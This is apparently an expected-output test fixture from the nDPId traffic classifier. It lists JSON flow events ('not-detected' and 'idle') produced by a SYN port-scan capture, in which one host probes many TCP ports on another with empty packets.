+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 